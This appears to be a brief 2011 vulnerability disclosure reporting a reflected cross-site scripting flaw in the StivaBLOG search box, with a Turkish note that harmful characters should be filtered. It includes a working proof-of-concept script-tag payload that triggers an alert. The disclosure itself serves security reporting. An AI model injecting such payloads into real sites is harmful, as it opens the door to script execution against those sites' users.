<------------------- header data start ------------------- >

# Application Name: StivaBLOG Cross Site Scripting Vuln.

# Author : expulse ~ Bug Researchers

# Date : 18.07.2011

# Demo: http://www.stivablog.com/demo.php // Post search box

# Software Link: http://www.stivablog.com

# Vuln Type : Reflected XSS

# Fixed : Zararli Karakterler Filitrelenmelidir.


< -- bug code start -- >

><script>alert(document.domain)</script> // Write search box

< -- bug code end of -- >

< ------------------- header data end of ------------------- >